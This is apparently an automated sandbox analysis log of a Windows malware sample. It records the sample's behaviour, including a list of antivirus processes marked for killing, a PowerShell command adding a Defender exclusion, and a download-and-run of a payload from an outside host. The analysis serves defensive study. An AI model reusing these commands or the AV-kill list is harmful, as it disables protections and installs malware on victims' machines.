DELETEAVPMAPP.EXE,ECONCEAL.EXE,SECHEALTHUI.EXE,RUNTIMEBROKER.EXE,ESCANMON.EXE,ESCANPRO.EXE,TRAYSSER.EXE,TRAYICOS.EXE,ECONSER.EXE,VIEWTCP.EXE,FSHDLL64.EXE,FSGK32.EXE,FSHOSTER32.EXE,FSMA32.EXE,FSORSP.EXE,FSSM32.EXE,FSM32.EXE,TRIGGER.EXE,FPROTTRAY.EXE,FPWIN.EXE,FPAVSERVER.EXE,AVK.EXE,GDBGINX64.EXE,AVKPROXY.EXE,GDSCAN.EXE,AVKWCTLX64.EXE,AVKSERVICE.EXE,AVKTRAY.EXE,GDKBFLTEXE32.EXE,GDSC.EXE,VIRUSUTILITIES.EXE,GUARDXSERVICE.EXE,GUARDXKICKOFF_X64.EXE,IPTRAY.EXE,FRESHCLAM.EXE,FRESHCLAMWRAP.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,MPCMDRUN.EXE,NANOSVC.EXE,NANOAV.EXE,NNF.EXE,NVCSVC.EXE,NBROWSER.EXE,NSEUPDATESVC.EXE,NFSERVICE.EXE,CMD.EXETASKKILL/IMNWSCMON.EXE,NJEEVES2.EXE,NVCOD.EXE,NVOY.EXE,ZLHH.EXE,ZLH.EXE,NPROSEC.EXE,ZANDA.EXE,NS.EXE,ACS.EXE,OP_MON.EXE,PSANHOST.EXE,PSUAMAIN.EXE,PSUASERVICE.EXE,AGENTSVC.EXE,BDSSVC.EXE,EMLPROXY.EXE,OPSSVC.EXE,ONLINENT.EXE,QUHLPSVC.EXE,SAPISSVC.EXE,SCANNER.EXE,SCANWSCS.EXE,SCPROXYSRV.EXE,SCSECSVC.EXE,SUPERANTISPYWARE.EXE,SASCORE64.EXE,SSUPDATE64.EXE,SUPERDELETE.EXE,SASTASK.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,UIWINMGR.EXE,UIWATCHDOG.EXE,UISEAGNT.EXE,PTWATCHDOG.EXE,PTSVCHOST.EXE,PTSESSIONAGENT.EXE,COREFRAMEWORKHOST.EXE,CORESERVICESHELL.EXE,UIUPDATETRAY.EXE,VIPREUI.EXE,SBAMSVC.EXE,SBAMTRAY.EXE,SBPIMSVC.EXE,BAVHM.EXE,BAVSVC.EXE,BAVTRAY.EXE,BAV.EXE,BAVWEBCLIENT.EXE,BAVUPDATER.EXE,MCSHIELDCCC.EXE,MCSHIELDRTM.EXE,MCSHIELDDS.EXE,MCS-UNINSTALL.EXE,SDSCAN.EXE,SDFSSVC.EXE,SDWELCOME.EXE,SDTRAY.EXE,UNTHREAT.EXE,UTSVC.EXE,FORTICLIENT.EXE,FCAPPDB.EXE,FCDBLOG.EXE,FCHELPER64.EXE,FMON.EXE,FORTIESNAC.EXE,FORTIPROXY.EXE,FORTISSLVPNDAEMON.EXE,FORTITRAY.EXE,FORTIFW.EXE,FORTICLIENT_DIAGNOSTIC_TOOL.EXE,AV_TASK.EXE,CERTREG.EXE,FILMSG.EXE,FILUP.EXE,FILWSCC.EXE,FILWSCC.EXE,PSVIEW.EXE,QUAMGR.EXE,QUAMGR.EXE,SCHMGR.EXE,SCHMGR.EXE,TWSSCAN.EXE,TWSSRV.EXE,USERREG.EXESEDEBUGPRIVILEGECOULD NOT SET SE_DEBUG_NAME PRIVILEGE
Source: eryy65ty.exe, 00000014.00000002.2679325725.000000000A42D000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ,AVPMAPP.EXEECONCEAL.EXESECHEALTHUI.EXERUNTIMEBROKER.EXEESCANMON.EXEESCANPRO.EXETRAYSSER.EXETRAYICOS.EXEECONSER.EXEVIEWTCP.EXEFSHDLL64.EXEFSGK32.EXEFSHOSTER32.EXEFSMA32.EXEFSORSP.EXEFSSM32.EXEFSM32.EXETRIGGER.EXEFPROTTRAY.EXEFPWIN.EXEFPAVSERVER.EXEAVK.EXEGDBGINX64.EXEAVKPROXY.EXEGDSCAN.EXEAVKWCTLX64.EXEAVKSERVICE.EXEAVKTRAY.EXEGDKBFLTEXE32.EXEGDSC.EXEVIRUSUTILITIES.EXEGUARDXSERVICE.EXEGUARDXKICKOFF_X64.EXEIPTRAY.EXEFRESHCLAM.EXEFRESHCLAMWRAP.EXEK7RTSCAN.EXEK7FWSRVC.EXEK7PSSRVC.EXEK7EMLPXY.EXEK7TSECURITY.EXEK7AVSCAN.EXEK7CRVSVC.EXEK7SYSMON.EXEK7TSMAIN.EXEK7TSMNGR.EXEMPCMDRUN.EXENANOSVC.EXENANOAV.EXENNF.EXENVCSVC.EXENBROWSER.EXENSEUPDATESVC.EXENFSERVICE.EXECMD.EXETASKKILL/IMNWSCMON.EXENJEEVES2.EXENVCOD.EXENVOY.EXEZLHH.EXEZLH.EXENPROSEC.EXEZANDA.EXENS.EXEACS.EXEOP_MON.EXEPSANHOST.EXEPSUAMAIN.EXEPSUASERVICE.EXEAGENTSVC.EXEBDSSVC.EXEEMLPROXY.EXEOPSSVC.EXEONLINENT.EXEQUHLPSVC.EXESAPISSVC.EXESCANNER.EXESCANWSCS.EXESCPROXYSRV.EXESCSECSVC.EXESUPERANTISPYWARE.EXESASCORE64.EXESSUPDATE64.EXESUPERDELETE.EXESASTASK.EXEK7RTSCAN.EXEK7FWSRVC.EXEK7PSSRVC.EXEK7EMLPXY.EXEK7TSECURITY.EXEK7AVSCAN.EXEK7CRVSVC.EXEK7SYSMON.EXEK7TSMAIN.EXEK7TSMNGR.EXEUIWINMGR.EXEUIWATCHDOG.EXEUISEAGNT.EXEPTWATCHDOG.EXEPTSVCHOST.EXEPTSESSIONAGENT.EXECOREFRAMEWORKHOST.EXECORESERVICESHELL.EXEUIUPDATETRAY.EXEVIPREUI.EXESBAMSVC.EXESBAMTRAY.EXESBPIMSVC.EXEBAVHM.EXEBAVSVC.EXEBAVTRAY.EXEBAV.EXEBAVWEBCLIENT.EXEBAVUPDATER.EXEMCSHIELDCCC.EXEMCSHIELDRTM.EXEMCSHIELDDS.EXEMCS-UNINSTALL.EXESDSCAN.EXESDFSSVC.EXESDWELCOME.EXESDTRAY.EXEUNTHREAT.EXEUTSVC.EXEFORTICLIENT.EXEFCAPPDB.EXEFCDBLOG.EXEFCHELPER64.EXEFMON.EXEFORTIESNAC.EXEFORTIPROXY.EXEFORTISSLVPNDAEMON.EXEFORTITRAY.EXEFORTIFW.EXEFORTICLIENT_DIAGNOSTIC_TOOL.EXEAV_TASK.EXECERTREG.EXEFILMSG.EXEFILUP.EXE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6459Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1283Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5854
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1561
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5918Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3803Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5746
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3613
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_20-51006
Source: C:\Windows\System32\loaddll32.exeAPI coverage: 4.8 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 6459 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2052Thread sleep count: 1283 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep count: 5854 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188Thread sleep count: 1561 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8148Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep count: 5918 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -24903104499507879s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep count: 3803 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2772Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2332Thread sleep count: 5746 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2288Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep count: 3613 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2768Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 1996Thread sleep time: -41769s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 6816Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 6472Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 3424Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D419B85 FindFirstFileExA,0_2_6D419B85
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E3DF60 IsDebuggerPresent,GetLastError,FindFirstFileW,GetLastError,GetLastError,GetLastError,CopyFileA,Sleep,FindNextFileW,GetLastError,FindClose,20_2_00E3DF60
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EAAB8F FindFirstFileExA,20_2_00EAAB8F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\migration\wtr\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-activedirectory-webservices\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\microsoft-client-license-platform-service-migration\Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: D:\sources\replacementmanifests\hwvid-migration-2\Jump to behavior
Source: 1696493971742.d1a7a52e-e3c7-4e69-93b1-055dbe542ec9.main.jsonlz4.27.drBinary or memory string: "VMware V[
Source: eryy65ty.exe, 00000014.00000002.2671850861.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D40866B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D40866B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D41995A mov eax, dword ptr fs:[00000030h]0_2_6D41995A
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D4102D7 mov eax, dword ptr fs:[00000030h]0_2_6D4102D7
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EA5FD1 mov eax, dword ptr fs:[00000030h]20_2_00EA5FD1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EA6016 mov eax, dword ptr fs:[00000030h]20_2_00EA6016
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00EA0A75 mov eax, dword ptr fs:[00000030h]20_2_00EA0A75
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D41A779 GetProcessHeap,0_2_6D41A779
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D40866B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D40866B
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D40D160 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D40D160
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D408390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D408390
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E9C1E9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00E9C1E9
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8E2E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00E8E2E4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8E4E1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00E8E4E1
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: 20_2_00E8E644 SetUnhandledExceptionFilter,20_2_00E8E644

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TD2HjoogPx.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6D408854 cpuid 0_2_6D408854
Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_6D41D567
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6D41DDDF
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6D41DCD7
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6D41D741
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6D41D7EA
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6D414EF1
Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_6D41DEB2
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_6D41D95E
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6D4149A3
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6D41D835
Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6D41D8D0
Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6D41DBAE
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00EAE076
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: EnumSystemLocalesW,20_2_00EA468D
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: GetLocaleInfoW,20_2_00EA4CE0
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00EAD72B
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: EnumSystemLocalesW,20_2_00EAD9F9
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: EnumSystemLocalesW,20_2_00EAD9AE
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: EnumSystemLocalesW,20_2_00EADA94
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00EADB22
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: GetLocaleInfoW,20_2_00EADD72
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_00EADE9B
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeCode function: GetLocaleInfoW,20_2_00EADFA3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
